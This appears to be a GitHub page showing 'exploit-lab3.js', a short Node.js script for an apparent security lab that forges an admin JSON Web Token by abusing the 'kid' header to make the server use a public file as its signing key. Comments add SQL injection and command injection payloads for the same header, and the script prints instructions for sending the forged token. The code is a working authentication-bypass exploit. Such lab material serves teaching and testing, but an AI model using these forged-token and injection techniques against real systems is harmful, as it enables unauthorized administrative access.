-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathexploit-lab3.js
More file actions
33 lines (28 loc) · 970 Bytes
/
Copy pathexploit-lab3.js
File metadata and controls
33 lines (28 loc) · 970 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
const jwt = require('jsonwebtoken');
const fs = require('fs');
// Read our dummy.js file content - this will be our key
const keyContent = fs.readFileSync('./public/dummy.js', 'utf8');
// Create malicious token
const createMaliciousToken = () => {
const payload = {
username: "admin",
role: "admin",
lab: "lab3"
};
const token = jwt.sign(payload, keyContent, {
header: {
alg: 'HS256',
typ: 'JWT',
kid: 'public/dummy.js' // Point to our dummy.js file
// “kid”: "aaaaaaa' UNION SELECT 'key';--"
// use the string "key" to verify the token
// i ruby -> “key_file” | whoami;
}
});
console.log('\n=== Malicious Token ===');
console.log(token);
console.log('\n=== How to Use ===');
console.log('1. Copy this token');
console.log('2. Use it in the Authorization header: Bearer <token>');
}
createMaliciousToken();